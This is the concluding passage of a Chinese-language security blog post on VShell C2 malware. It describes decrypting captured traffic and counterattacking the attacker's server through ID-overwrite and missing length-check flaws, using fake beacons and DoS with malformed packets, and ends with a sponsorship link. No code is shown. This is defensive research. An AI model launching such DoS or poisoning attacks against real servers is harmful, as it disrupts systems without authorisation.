通过本次深入分析,我们揭开了 VShell 的面纱,我们不仅能够编写 Python 脚本实时解密 PCAP 流量,还原受害者信息与指令内容,同时,我们掌握了主动反击的主导权。 利用服务端在逻辑处理上的漏洞(如 ID 覆盖与长度校验缺失),防御者完全可以构造 Fake Beacon 对攻击者的控制台进行“投毒”。甚至利用畸形数据包触发 DoS 导致 C2 服务端崩溃。

Take care of your clients and be well.

如果你喜欢我的文章,欢迎关注我的 Blog。如果您愿意慷慨解囊,这里是我的 Github Sponsor 地址: https://github.com/sponsors/Esonhugh